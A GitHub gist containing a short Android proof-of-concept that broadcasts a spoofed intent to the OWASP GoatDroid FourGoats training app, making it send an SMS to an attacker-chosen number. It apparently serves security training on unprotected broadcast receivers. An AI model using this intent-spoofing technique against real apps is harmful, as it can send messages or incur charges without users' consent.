Skip to content

Instantly share code, notes, and snippets.

@pwntester
Created November 17, 2012 14:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save pwntester/4096514 to your computer and use it in GitHub Desktop.
Save pwntester/4096514 to your computer and use it in GitHub Desktop.
c
Intent broadcastIntent=new Intent();
broadcastIntent.setAction("org.owasp.goatdroid.fourgoats.SOCIAL_SMS");
broadcastIntent.putExtra("phoneNumber","0034666666666");
broadcastIntent.putExtra("message","Hi");
sendBroadcast(broadcastIntent)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment